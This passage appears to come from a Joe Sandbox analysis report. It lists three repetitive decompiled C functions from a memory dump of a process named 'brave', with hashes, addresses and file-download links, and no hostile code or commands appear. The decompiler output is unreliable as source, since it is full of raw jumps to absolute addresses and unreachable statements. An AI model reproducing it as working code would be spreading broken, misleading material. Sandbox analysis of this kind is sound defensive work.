Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 62a82320fdceb24766c0b0c8cff22094254bc4afba2bc82755b66d49ed25b182
Instruction ID: 0c5c731c4af127669588ed6adb7c5844089cb7d975a8b9525cfbc2d29d4b8632
Opcode Fuzzy Hash: 62a82320fdceb24766c0b0c8cff22094254bc4afba2bc82755b66d49ed25b182
Instruction Fuzzy Hash: DB310672909F0482E7349F18F88535AB7A0FB94BA8F554625C2CC0B7B5CFBDD1888794

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715B964A2 Relevance: 1.3, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00007FF77FF715B964A2(void* __rbx, signed char* _a40) {
				signed int _t52;
				signed int _t56;
				signed int _t59;
				void* _t78;
				intOrPtr* _t83;
				signed char* _t84;
				signed char* _t86;
				signed char* _t87;
				signed char* _t105;
				signed char* _t106;
				long long _t112;

				_t56 =  *(__rbx + 0x28);
				if (_t56 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x15bc2683;
				_t83 = (_t56 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t83 + 4)) = 0;
				 *(__rbx + 0x28) = _t56 + 1;
				 *_t83 = 0x27;
				 *((long long*)(_t83 + 0x10)) = 0x15e453e0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 8;
				goto 0x15b95c22;
				E00007FF77FF715B96EE0(_t83, __rbx);
				_a40 = _t83;
				if (_t83 == 0) goto 0x15b95c20;
				if ( *_t83 != 0x18) goto 0x15b95d39;
				goto 0x15b95c22;
				goto 0x15b96051;
				_t84 = _t83 + 1;
				 *(__rbx + 0x18) = _t84;
				E00007FF77FF715B989F0(__rbx);
				E00007FF77FF715B94DD0();
				_a40 = _t84;
				_t105 = _t84;
				goto 0x15b95f58;
				r12d =  *(__rbx + 0x28);
				 *(__rbx + 0x18) =  &(_t105[1]);
				E00007FF77FF715B989F0(__rbx);
				if ( *( *(__rbx + 0x18)) == 0x49) goto 0x15b96584;
				 *(__rbx + 0x18) = _t105;
				_t86 = _a40;
				 *(__rbx + 0x28) = r12d;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48));
				goto 0x15b95d30;
				_t112 = _a40;
				if (_t112 == 0) goto 0x15b95c20;
				_t59 =  *(__rbx + 0x38);
				if (_t59 -  *((intOrPtr*)(__rbx + 0x3c)) >= 0) goto 0x15b95c20;
				 *((long long*)( *((intOrPtr*)(__rbx + 0x30)) + _t59 * 8)) = _t112;
				 *(__rbx + 0x38) = _t59 + 1;
				E00007FF77FF715B94DD0();
				_a40 = _t86;
				 *((intOrPtr*)(__rbx + 0x4c)) = 1;
				 *(__rbx + 0x18) = _t112 + 3;
				E00007FF77FF715B97F20(_t86, __rbx);
				_t106 = _t86;
				if (_t86 != 0) goto 0x15b96386;
				goto 0x15b95c20;
				asm("o16 nop [eax+eax]");
				_push(0x15e453e0);
				_push(_t106);
				_push(__rbx);
				_t87 =  *(__rbx + 0x18);
				if (sil == 0) goto 0x15b966c8;
				 *(__rbx + 0x18) =  &(_t87[1]);
				r10d =  *_t87 & 0x000000ff;
				if (sil != 0) goto 0x15b966d0;
				r8d = 0x45;
				asm("o16 nop [eax+eax]");
				_t52 = (r8d >> 0x1f) + r8d >> 1;
				_t78 =  *((intOrPtr*)( *((intOrPtr*)(0x15e44820 + (_t52 + _t52 * 2) * 8)))) - r10b;
				if (_t78 == 0) goto 0x15b96680;
				if (_t78 <= 0) goto 0x15b966c0;
				r8d = _t52;
				if (0 != r8d) goto 0x15b96648;
				return 0;
			}

0x7ff715b964a2
0x7ff715b964a8
0x7ff715b964bf
0x7ff715b964c3
0x7ff715b964cb
0x7ff715b964ce
0x7ff715b964d4
0x7ff715b964d8
0x7ff715b964dc
0x7ff715b964eb
0x7ff715b964f0
0x7ff715b964f8
0x7ff715b96501
0x7ff715b96507
0x7ff715b96512
0x7ff715b96517
0x7ff715b9651e
0x7ff715b96522
0x7ff715b96537
0x7ff715b9653c
0x7ff715b96541
0x7ff715b96544
0x7ff715b96550
0x7ff715b96557
0x7ff715b9655e
0x7ff715b9656a
0x7ff715b9656c
0x7ff715b96570
0x7ff715b96575
0x7ff715b9657c
0x7ff715b9657f
0x7ff715b96584
0x7ff715b9658c
0x7ff715b96592
0x7ff715b96598
0x7ff715b965a8
0x7ff715b965b2
0x7ff715b965ba
0x7ff715b965bf
0x7ff715b965d0
0x7ff715b965da
0x7ff715b965de
0x7ff715b965e6
0x7ff715b965ec
0x7ff715b965f2
0x7ff715b965f7
0x7ff715b96600
0x7ff715b96601
0x7ff715b96602
0x7ff715b96607
0x7ff715b96614
0x7ff715b9661e
0x7ff715b96626
0x7ff715b9662d
0x7ff715b96633
0x7ff715b96642
0x7ff715b96656
0x7ff715b96666
0x7ff715b96669
0x7ff715b9666b
0x7ff715b9666d
0x7ff715b96673
0x7ff715b9667e

APIs

malloc.MSVCRT ref: 00007FF715BC2752

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: a086c596611ef4ea8cac5059dbacc38b62ed55accf5125814614d9dfe2806d9e
Instruction ID: dc65c0f844571fcec78211634be13dfd01dddf6f69eec7bea21377dc500365f4
Opcode Fuzzy Hash: a086c596611ef4ea8cac5059dbacc38b62ed55accf5125814614d9dfe2806d9e
Instruction Fuzzy Hash: CC312772909F0482E7349F18E88535AB7A0FB94B68F554225C2CC077B4CFBDD188C794

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715B962C7 Relevance: 1.3, APIs: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00007FF77FF715B962C7(void* __eax, void* __ebx, void* __rbx, void* __rcx, void* __rdx, void* __r8, signed char* _a40) {
				signed int _t100;
				signed int _t111;
				signed int _t117;
				signed int _t119;
				signed int _t122;
				signed int _t124;
				signed int _t126;
				signed int _t129;
				signed int _t132;
				void* _t160;
				intOrPtr* _t165;
				intOrPtr* _t168;
				char* _t169;
				signed char* _t170;
				intOrPtr* _t173;
				intOrPtr* _t176;
				signed char* _t179;
				intOrPtr* _t182;
				signed char* _t183;
				signed char* _t185;
				signed char* _t186;
				intOrPtr* _t218;
				signed char* _t219;
				signed char* _t220;
				long long _t229;
				void* _t236;

				_t117 =  *(__rbx + 0x28);
				if (_t117 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x15bc26a9;
				_t165 = (_t117 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t165 + 4)) = 0;
				 *(__rbx + 0x28) = _t117 + 1;
				 *_t165 = 0x27;
				 *((long long*)(_t165 + 0x10)) = 0x15e453c0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 8;
				_t119 =  *(__rbx + 0x28);
				if (_t119 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x15bc2702;
				_t168 = (_t119 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t168 + 4)) = 0;
				 *(__rbx + 0x28) = _t119 + 1;
				 *_t168 = 0x27;
				 *((long long*)(_t168 + 0x10)) = 0x15e45360;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 0xa;
				goto 0x15b95c22;
				 *_t168 =  *_t168 + __eax;
				_t100 =  *(__rbx + 0x28);
				if (_t100 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x15b95c20;
				_t218 = (_t100 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t218 + 4)) = 0;
				 *(__rbx + 0x28) = _t100 + 1;
				 *_t218 = 0x42;
				 *((intOrPtr*)(_t218 + 0x10)) = E00007FF77FF715B94E90(_t168, __rbx, __rdx, __r8, _t236);
				_t169 =  *(__rbx + 0x18);
				if ( *_t169 != 0x5f) goto 0x15b95c20;
				_t170 = _t169 + 1;
				 *(__rbx + 0x18) = _t170;
				E00007FF77FF715B95BC0();
				E00007FF77FF715B94DD0();
				_a40 = _t170;
				_t122 =  *(__rbx + 0x28);
				if (_t122 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x15bc2670;
				_t173 = (_t122 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t173 + 4)) = 0;
				 *(__rbx + 0x28) = _t122 + 1;
				 *_t173 = 0x27;
				 *((long long*)(_t173 + 0x10)) = 0x15e45340;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 9;
				_t124 =  *(__rbx + 0x28);
				if (_t124 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x15bc2715;
				_t176 = (_t124 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t176 + 4)) = 0;
				 *(__rbx + 0x28) = _t124 + 1;
				 *_t176 = 0x27;
				 *((long long*)(_t176 + 0x10)) = 0x15e45400;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 0x11;
				_t126 =  *(__rbx + 0x28);
				if (_t126 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x15bc26ef;
				_t179 = (_t126 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t179 + 4)) = 0;
				 *(__rbx + 0x28) = _t126 + 1;
				 *_t179 = 0x27;
				 *((long long*)(_t179 + 0x10)) = 0x15e453a0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 7;
				E00007FF77FF715B95BC0();
				r9d = 0;
				E00007FF77FF715B94DD0();
				_a40 = _t179;
				_t129 =  *(__rbx + 0x28);
				if (_t129 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x15bc2683;
				_t182 = (_t129 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t182 + 4)) = 0;
				 *(__rbx + 0x28) = _t129 + 1;
				 *_t182 = 0x27;
				 *((long long*)(_t182 + 0x10)) = 0x15e453e0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 8;
				goto 0x15b95c22;
				E00007FF77FF715B96EE0(_t182, __rbx);
				_a40 = _t182;
				if (_t182 == 0) goto 0x15b95c20;
				if ( *_t182 != 0x18) goto 0x15b95d39;
				goto 0x15b95c22;
				goto 0x15b96051;
				_t183 = _t182 + 1;
				 *(__rbx + 0x18) = _t183;
				E00007FF77FF715B989F0(__rbx);
				E00007FF77FF715B94DD0();
				_a40 = _t183;
				_t219 = _t183;
				goto 0x15b95f58;
				r12d =  *(__rbx + 0x28);
				 *(__rbx + 0x18) =  &(_t219[1]);
				E00007FF77FF715B989F0(__rbx);
				if ( *( *(__rbx + 0x18)) == 0x49) goto 0x15b96584;
				 *(__rbx + 0x18) = _t219;
				_t185 = _a40;
				 *(__rbx + 0x28) = r12d;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48));
				goto 0x15b95d30;
				_t229 = _a40;
				if (_t229 == 0) goto 0x15b95c20;
				_t132 =  *(__rbx + 0x38);
				if (_t132 -  *((intOrPtr*)(__rbx + 0x3c)) >= 0) goto 0x15b95c20;
				 *((long long*)( *((intOrPtr*)(__rbx + 0x30)) + _t132 * 8)) = _t229;
				 *(__rbx + 0x38) = _t132 + 1;
				E00007FF77FF715B94DD0();
				_a40 = _t185;
				 *((intOrPtr*)(__rbx + 0x4c)) = 1;
				 *(__rbx + 0x18) = _t229 + 3;
				E00007FF77FF715B97F20(_t185, __rbx);
				_t220 = _t185;
				if (_t185 != 0) goto 0x15b96386;
				goto 0x15b95c20;
				asm("o16 nop [eax+eax]");
				_push(0x15e453e0);
				_push(_t220);
				_push(__rbx);
				_t186 =  *(__rbx + 0x18);
				if (sil == 0) goto 0x15b966c8;
				 *(__rbx + 0x18) =  &(_t186[1]);
				r10d =  *_t186 & 0x000000ff;
				if (sil != 0) goto 0x15b966d0;
				r8d = 0x45;
				asm("o16 nop [eax+eax]");
				_t111 = (r8d >> 0x1f) + r8d >> 1;
				_t160 =  *((intOrPtr*)( *((intOrPtr*)(0x15e44820 + (_t111 + _t111 * 2) * 8)))) - r10b;
				if (_t160 == 0) goto 0x15b96680;
				if (_t160 <= 0) goto 0x15b966c0;
				r8d = _t111;
				if (0 != r8d) goto 0x15b96648;
				return 0;
			}

0x7ff715b962c7
0x7ff715b962cd
0x7ff715b962e4
0x7ff715b962e8
0x7ff715b962f0
0x7ff715b962f3
0x7ff715b962f9
0x7ff715b962fd
0x7ff715b96306
0x7ff715b9630c
0x7ff715b96323
0x7ff715b96327
0x7ff715b9632f
0x7ff715b96332
0x7ff715b96338
0x7ff715b9633c
0x7ff715b96340
0x7ff715b9634e
0x7ff715b96350
0x7ff715b96356
0x7ff715b96369
0x7ff715b9636d
0x7ff715b96375
0x7ff715b96378
0x7ff715b96383
0x7ff715b96386
0x7ff715b9638d
0x7ff715b96393
0x7ff715b9639a
0x7ff715b9639e
0x7ff715b963b1
0x7ff715b963b6
0x7ff715b963c0
0x7ff715b963c6
0x7ff715b963dd
0x7ff715b963e1
0x7ff715b963e9
0x7ff715b963ec
0x7ff715b963f2
0x7ff715b963f6
0x7ff715b963ff
0x7ff715b96405
0x7ff715b9641c
0x7ff715b96420
0x7ff715b96428
0x7ff715b9642b
0x7ff715b96431
0x7ff715b96435
0x7ff715b9643e
0x7ff715b96444
0x7ff715b9645b
0x7ff715b9645f
0x7ff715b96467
0x7ff715b9646a
0x7ff715b96470
0x7ff715b96474
0x7ff715b96480
0x7ff715b96485
0x7ff715b96493
0x7ff715b96498
0x7ff715b964a2
0x7ff715b964a8
0x7ff715b964bf
0x7ff715b964c3
0x7ff715b964cb
0x7ff715b964ce
0x7ff715b964d4
0x7ff715b964d8
0x7ff715b964dc
0x7ff715b964eb
0x7ff715b964f0
0x7ff715b964f8
0x7ff715b96501
0x7ff715b96507
0x7ff715b96512
0x7ff715b96517
0x7ff715b9651e
0x7ff715b96522
0x7ff715b96537
0x7ff715b9653c
0x7ff715b96541
0x7ff715b96544
0x7ff715b96550
0x7ff715b96557
0x7ff715b9655e
0x7ff715b9656a
0x7ff715b9656c
0x7ff715b96570
0x7ff715b96575
0x7ff715b9657c
0x7ff715b9657f
0x7ff715b96584
0x7ff715b9658c
0x7ff715b96592
0x7ff715b96598
0x7ff715b965a8
0x7ff715b965b2
0x7ff715b965ba
0x7ff715b965bf
0x7ff715b965d0
0x7ff715b965da
0x7ff715b965de
0x7ff715b965e6
0x7ff715b965ec
0x7ff715b965f2
0x7ff715b965f7
0x7ff715b96600
0x7ff715b96601
0x7ff715b96602
0x7ff715b96607
0x7ff715b96614
0x7ff715b9661e
0x7ff715b96626
0x7ff715b9662d
0x7ff715b96633
0x7ff715b96642
0x7ff715b96656
0x7ff715b96666
0x7ff715b96669
0x7ff715b9666b
0x7ff715b9666d
0x7ff715b96673
0x7ff715b9667e

APIs

malloc.MSVCRT ref: 00007FF715BC2752

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 0fe0bb664fee0acb066360bbf1dd7b13264afc6f109f4210fc352504dfbd1cf1
Instruction ID: 72aa7cb4f0ec35761491f486476141664c47093a659c3c07ccdc24bf635845b0
Opcode Fuzzy Hash: 0fe0bb664fee0acb066360bbf1dd7b13264afc6f109f4210fc352504dfbd1cf1
Instruction Fuzzy Hash: B8210772909F05C2E7349F18E88535AB7A0FB84B68F554225C2CC073B4CFBDD18887A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715B96249 Relevance: 1.3, APIs: 1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00007FF77FF715B96249(void* __eax, void* __ebx, void* __rbx, void* __rcx, void* __rdx, void* __r8, signed char* _a40) {
				signed int _t116;
				signed int _t127;
				signed int _t133;
				signed int _t135;
				signed int _t137;
				signed int _t139;
				signed int _t142;
				signed int _t144;
				signed int _t146;
				signed int _t149;
				signed int _t152;
				void* _t182;
				intOrPtr* _t187;
				intOrPtr* _t190;
				intOrPtr* _t193;
				intOrPtr* _t196;
				char* _t197;
				signed char* _t198;
				intOrPtr* _t201;
				intOrPtr* _t204;
				signed char* _t207;
				intOrPtr* _t210;
				signed char* _t211;
				signed char* _t213;
				signed char* _t214;
				intOrPtr* _t248;
				signed char* _t249;
				signed char* _t250;
				long long _t259;
				void* _t266;

				_t133 =  *(__rbx + 0x28);
				if (_t133 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x15bc26c9;
				_t187 = (_t133 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t187 + 4)) = 0;
				 *(__rbx + 0x28) = _t133 + 1;
				 *_t187 = 0x27;
				 *((long long*)(_t187 + 0x10)) = 0x15e45380;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 4;
				_t135 =  *(__rbx + 0x28);
				if (_t135 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x15bc26dc;
				_t190 = (_t135 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t190 + 4)) = 0;
				 *(__rbx + 0x28) = _t135 + 1;
				 *_t190 = 0x27;
				 *((long long*)(_t190 + 0x10)) = 0x15e45320;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 9;
				_t137 =  *(__rbx + 0x28);
				if (_t137 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x15bc26a9;
				_t193 = (_t137 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t193 + 4)) = 0;
				 *(__rbx + 0x28) = _t137 + 1;
				 *_t193 = 0x27;
				 *((long long*)(_t193 + 0x10)) = 0x15e453c0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 8;
				_t139 =  *(__rbx + 0x28);
				if (_t139 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x15bc2702;
				_t196 = (_t139 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t196 + 4)) = 0;
				 *(__rbx + 0x28) = _t139 + 1;
				 *_t196 = 0x27;
				 *((long long*)(_t196 + 0x10)) = 0x15e45360;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 0xa;
				goto 0x15b95c22;
				 *_t196 =  *_t196 + __eax;
				_t116 =  *(__rbx + 0x28);
				if (_t116 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x15b95c20;
				_t248 = (_t116 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t248 + 4)) = 0;
				 *(__rbx + 0x28) = _t116 + 1;
				 *_t248 = 0x42;
				 *((intOrPtr*)(_t248 + 0x10)) = E00007FF77FF715B94E90(_t196, __rbx, __rdx, __r8, _t266);
				_t197 =  *(__rbx + 0x18);
				if ( *_t197 != 0x5f) goto 0x15b95c20;
				_t198 = _t197 + 1;
				 *(__rbx + 0x18) = _t198;
				E00007FF77FF715B95BC0();
				E00007FF77FF715B94DD0();
				_a40 = _t198;
				_t142 =  *(__rbx + 0x28);
				if (_t142 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x15bc2670;
				_t201 = (_t142 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t201 + 4)) = 0;
				 *(__rbx + 0x28) = _t142 + 1;
				 *_t201 = 0x27;
				 *((long long*)(_t201 + 0x10)) = 0x15e45340;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 9;
				_t144 =  *(__rbx + 0x28);
				if (_t144 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x15bc2715;
				_t204 = (_t144 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t204 + 4)) = 0;
				 *(__rbx + 0x28) = _t144 + 1;
				 *_t204 = 0x27;
				 *((long long*)(_t204 + 0x10)) = 0x15e45400;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 0x11;
				_t146 =  *(__rbx + 0x28);
				if (_t146 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x15bc26ef;
				_t207 = (_t146 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t207 + 4)) = 0;
				 *(__rbx + 0x28) = _t146 + 1;
				 *_t207 = 0x27;
				 *((long long*)(_t207 + 0x10)) = 0x15e453a0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 7;
				E00007FF77FF715B95BC0();
				r9d = 0;
				E00007FF77FF715B94DD0();
				_a40 = _t207;
				_t149 =  *(__rbx + 0x28);
				if (_t149 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x15bc2683;
				_t210 = (_t149 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t210 + 4)) = 0;
				 *(__rbx + 0x28) = _t149 + 1;
				 *_t210 = 0x27;
				 *((long long*)(_t210 + 0x10)) = 0x15e453e0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 8;
				goto 0x15b95c22;
				E00007FF77FF715B96EE0(_t210, __rbx);
				_a40 = _t210;
				if (_t210 == 0) goto 0x15b95c20;
				if ( *_t210 != 0x18) goto 0x15b95d39;
				goto 0x15b95c22;
				goto 0x15b96051;
				_t211 = _t210 + 1;
				 *(__rbx + 0x18) = _t211;
				E00007FF77FF715B989F0(__rbx);
				E00007FF77FF715B94DD0();
				_a40 = _t211;
				_t249 = _t211;
				goto 0x15b95f58;
				r12d =  *(__rbx + 0x28);
				 *(__rbx + 0x18) =  &(_t249[1]);
				E00007FF77FF715B989F0(__rbx);
				if ( *( *(__rbx + 0x18)) == 0x49) goto 0x15b96584;
				 *(__rbx + 0x18) = _t249;
				_t213 = _a40;
				 *(__rbx + 0x28) = r12d;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48));
				goto 0x15b95d30;
				_t259 = _a40;
				if (_t259 == 0) goto 0x15b95c20;
				_t152 =  *(__rbx + 0x38);
				if (_t152 -  *((intOrPtr*)(__rbx + 0x3c)) >= 0) goto 0x15b95c20;
				 *((long long*)( *((intOrPtr*)(__rbx + 0x30)) + _t152 * 8)) = _t259;
				 *(__rbx + 0x38) = _t152 + 1;
				E00007FF77FF715B94DD0();
				_a40 = _t213;
				 *((intOrPtr*)(__rbx + 0x4c)) = 1;
				 *(__rbx + 0x18) = _t259 + 3;
				E00007FF77FF715B97F20(_t213, __rbx);
				_t250 = _t213;
				if (_t213 != 0) goto 0x15b96386;
				goto 0x15b95c20;
				asm("o16 nop [eax+eax]");
				_push(0x15e453e0);
				_push(_t250);
				_push(__rbx);
				_t214 =  *(__rbx + 0x18);
				if (sil == 0) goto 0x15b966c8;
				 *(__rbx + 0x18) =  &(_t214[1]);
				r10d =  *_t214 & 0x000000ff;
				if (sil != 0) goto 0x15b966d0;
				r8d = 0x45;
				asm("o16 nop [eax+eax]");
				_t127 = (r8d >> 0x1f) + r8d >> 1;
				_t182 =  *((intOrPtr*)( *((intOrPtr*)(0x15e44820 + (_t127 + _t127 * 2) * 8)))) - r10b;
				if (_t182 == 0) goto 0x15b96680;
				if (_t182 <= 0) goto 0x15b966c0;
				r8d = _t127;
				if (0 != r8d) goto 0x15b96648;
				return 0;
			}

0x7ff715b96249
0x7ff715b9624f
0x7ff715b96266
0x7ff715b9626a
0x7ff715b96272
0x7ff715b96275
0x7ff715b9627b
0x7ff715b9627f
0x7ff715b96288
0x7ff715b9628e
0x7ff715b962a5
0x7ff715b962a9
0x7ff715b962b1
0x7ff715b962b4
0x7ff715b962ba
0x7ff715b962be
0x7ff715b962c7
0x7ff715b962cd
0x7ff715b962e4
0x7ff715b962e8
0x7ff715b962f0
0x7ff715b962f3
0x7ff715b962f9
0x7ff715b962fd
0x7ff715b96306
0x7ff715b9630c
0x7ff715b96323
0x7ff715b96327
0x7ff715b9632f
0x7ff715b96332
0x7ff715b96338
0x7ff715b9633c
0x7ff715b96340
0x7ff715b9634e
0x7ff715b96350
0x7ff715b96356
0x7ff715b96369
0x7ff715b9636d
0x7ff715b96375
0x7ff715b96378
0x7ff715b96383
0x7ff715b96386
0x7ff715b9638d
0x7ff715b96393
0x7ff715b9639a
0x7ff715b9639e
0x7ff715b963b1
0x7ff715b963b6
0x7ff715b963c0
0x7ff715b963c6
0x7ff715b963dd
0x7ff715b963e1
0x7ff715b963e9
0x7ff715b963ec
0x7ff715b963f2
0x7ff715b963f6
0x7ff715b963ff
0x7ff715b96405
0x7ff715b9641c
0x7ff715b96420
0x7ff715b96428
0x7ff715b9642b
0x7ff715b96431
0x7ff715b96435
0x7ff715b9643e
0x7ff715b96444
0x7ff715b9645b
0x7ff715b9645f
0x7ff715b96467
0x7ff715b9646a
0x7ff715b96470
0x7ff715b96474
0x7ff715b96480
0x7ff715b96485
0x7ff715b96493
0x7ff715b96498
0x7ff715b964a2
0x7ff715b964a8
0x7ff715b964bf
0x7ff715b964c3
0x7ff715b964cb
0x7ff715b964ce
0x7ff715b964d4
0x7ff715b964d8
0x7ff715b964dc
0x7ff715b964eb
0x7ff715b964f0
0x7ff715b964f8
0x7ff715b96501
0x7ff715b96507
0x7ff715b96512
0x7ff715b96517
0x7ff715b9651e
0x7ff715b96522
0x7ff715b96537
0x7ff715b9653c
0x7ff715b96541
0x7ff715b96544
0x7ff715b96550
0x7ff715b96557
0x7ff715b9655e
0x7ff715b9656a
0x7ff715b9656c
0x7ff715b96570
0x7ff715b96575
0x7ff715b9657c
0x7ff715b9657f
0x7ff715b96584
0x7ff715b9658c
0x7ff715b96592
0x7ff715b96598
0x7ff715b965a8
0x7ff715b965b2
0x7ff715b965ba
0x7ff715b965bf
0x7ff715b965d0
0x7ff715b965da
0x7ff715b965de
0x7ff715b965e6
0x7ff715b965ec
0x7ff715b965f2
0x7ff715b965f7
0x7ff715b96600
0x7ff715b96601
0x7ff715b96602
0x7ff715b96607
0x7ff715b96614
0x7ff715b9661e
0x7ff715b96626
0x7ff715b9662d
0x7ff715b96633
0x7ff715b96642
0x7ff715b96656
0x7ff715b96666
0x7ff715b96669
0x7ff715b9666b
0x7ff715b9666d
0x7ff715b96673
0x7ff715b9667e

APIs

malloc.MSVCRT ref: 00007FF715BC2752

Memory Dump Source

